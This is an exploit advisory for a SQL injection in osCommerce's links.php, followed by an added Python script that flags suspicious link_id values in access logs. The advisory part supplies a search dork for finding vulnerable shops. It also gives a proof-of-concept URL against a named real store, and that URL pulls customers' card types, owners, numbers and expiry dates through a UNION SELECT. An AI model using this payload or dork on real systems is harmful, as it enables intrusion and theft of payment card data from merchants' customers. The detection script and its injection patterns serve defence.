osCommerce SQL Injection Vuln


[o] osCommerce SQL Injection Vulnerability
Software : osCommerce
Vendor : http://www.oscommerce.com/
Download : http://www.oscommerce.com/solutions/downloads/
Author : NoGe

[o] Vulnerable file
links.php

[o] Exploit
http://localhost/[path]/links.php?link_id==[SQL]

[o] Proof of concept
http://www.sportmueller-pocking.de/catalog/links.php?link_id=12661+AND+1=2+UNION+SELECT+0,1,group_concat%28cc_type,0x3a,cc_owner,0x3a,cc_number,0x3a,cc_expires%29,3,4,5,6,7,8+from+orders/*

[o] Dork
"Powered by osCommerce"

[o] Note
I don't know which version of osCommerce this is, but it's vulnerable.
There are not too many targets, so I think this is an old version.
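
[o] Detection example
An added example, not part of the original advisory or of osCommerce: a log check that flags requests to links.php whose link_id is not a plain integer. It assumes link_id is meant to be a numeric ID, as the value 12661 in the proof of concept suggests; the log lines are constructed and the function name is hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format, documentation IP range).
SAMPLE_LOG = '''\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /catalog/links.php?link_id=12661 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /catalog/links.php?link_id=12661+AND+1=2+UNION+SELECT+0,1,2/* HTTP/1.1" 200 7300 "-" "Mozilla/5.0"
192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /catalog/links.php?link_id=12661%20uNiOn%20sElEcT%200x3a HTTP/1.1" 200 7300 "-" "curl/8.0"
192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /catalog/index.php?cPath=3 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
192.0.2.77 - - [01/Jan/2024:10:00:20 +0000] "GET /shop/links.php?link_id=12661%27 HTTP/1.1" 500 310 "-" "Mozilla/5.0"
'''

# Client IP, then the quoted request line: METHOD target HTTP/x.y
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Tokens seen in the advisory's proof of concept: UNION SELECT, a comment opener, hex literals.
SQL_HINT = re.compile(r'\bunion\b.*\bselect\b|/\*|--|\b0x[0-9a-f]+\b', re.I)


def suspicious_link_id_requests(log_text):
    """Return one finding per links.php request whose link_id is not all digits."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/links.php"):
            continue
        # parse_qs URL-decodes values, so %20 and + both become spaces before matching.
        for value in parse_qs(url.query, keep_blank_values=True).get("link_id", []):
            if value == "" or (value.isascii() and value.isdigit()):
                continue
            reason = "sql-keywords" if SQL_HINT.search(value) else "non-numeric"
            findings.append({"ip": m.group("ip"), "link_id": value, "reason": reason})
    return findings


if __name__ == "__main__":
    for finding in suspicious_link_id_requests(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule, enforced in the application before link_id reaches the query, is the corresponding fix.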